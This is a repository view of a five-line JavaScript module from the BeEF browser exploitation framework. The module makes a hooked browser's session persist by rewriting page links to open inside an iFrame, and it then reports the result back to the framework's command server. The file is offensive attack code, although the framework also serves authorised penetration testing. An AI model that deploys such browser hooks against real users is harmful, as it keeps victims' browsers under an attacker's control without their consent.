Files
beef/modules/commands/persistence/iframe_above/iframe_above.js
passbe 285094384f Added iFrame Persistance module
git-svn-id: https://beef.googlecode.com/svn/trunk@656 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-01-03 02:40:41 +00:00

5 lines
177 B
JavaScript

beef.execute(function() {
beef.session.persistant();
beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
});